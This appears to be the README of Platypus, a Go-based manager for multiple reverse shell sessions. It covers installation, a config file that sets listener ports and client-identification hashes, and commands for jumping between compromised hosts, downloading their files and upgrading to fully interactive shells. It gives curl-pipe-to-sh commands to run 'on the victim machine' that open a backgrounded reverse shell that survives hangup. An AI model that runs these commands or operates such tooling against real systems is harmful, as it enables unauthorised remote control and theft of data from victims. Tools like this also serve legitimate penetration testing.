A modern multiple reverse shell sessions/clients manager via terminal written in go
There are multiple ways to run this tool, feel free to choose one of the following method.
sudo apt install upx
git clone https://github.com/WangYihang/Platypus cd Platypus make
Platypusprebuild binary from HERE
./Platypus, then the
config.yml will be generated automatically, and the config file is simple enough.
servers: - host: "0.0.0.0" port: 13337 # Platypus is able to use several properties as unique identifier (primirary key) of a single client. # All available properties are listed below: # `%i` IP # `%u` Username # `%m` MAC address # `%o` Operating System # `%t` Income TimeStamp hashFormat: "%i %u %m %o" - host: "0.0.0.0" port: 13338 # Using TimeStamp allows us to track all connections from the same IP / Username / OS and MAC. hashFormat: "%i %u %m %o %t" restful: host: "127.0.0.1" port: 7331 enable: true # Check new releases from GitHub when starting Platypus update: false
As you can see, platypus will check for updates, then start listening on port 13337, 13338 and 7331
The three port have different aims.
If you want another reverse shell listening port, just type
Run 0.0.0.0 1339 or modify the
Also, platypus will print help information about RaaS which release you from remembering tedious reverse shell commands.
With platypus, all you have to do is just copy-and-paste the
curl command and execute it on the victim machine.
curl http://127.0.0.1:13337/|sh curl http://192.168.88.129:13337/|sh
Now, suppose that the victim is attacked by the attacker and a reverse shell command will be executed on the machine of victim.
Notice, the RaaS feature ensure that the reverse shell process is running in background and ignore the hangup signal.
You can use
List command to print table style infomation about all listening servers and connected clients. Notice that the port
13337 will reset the connection from the same machine (we consider two connection are same iff they share the same Hash value, the info being hash can be configured in
13338 will not reset such connections, which provide more repliability.
Jump command can take you a tour between clients.
Jump [HASH / Alias] to jump.
Alias is a alias of a specific client, you can set a alias of a client via
Also, for jumping through
HASH, you do not need to type the whole hash, just prefix of hash will work.
All commands are case insensitive, feel free to use tab for completing.
Interact will popup a shell, just like
Download command to download file from reverse shell client to attacker's machine.
Upload command to upload file to the current interacting client.
This feature only works on *nix clients
For your user experience, we highly RECOMMEND you use
Upgradecommand to upgrade the plain reverse shell to a encrypted interactive shell.
Try to Spawn
/bin/bash via Python, then the shell is fully interactive (You can use vim / htop and other stuffs).
Jump to select a client, then type
PTY, then type
Interact to drop into a fully interactive shell.
You can just simply type , to avoid the situation in issue #39, you can use
exit to exit pty mode
platyquit to quit the fully interactive shell mode.
Thank you to all our backers! 🙏 [Become a backer]
Support this project by becoming a sponsor. Your logo will show up here with a link to your website. [Become a sponsor]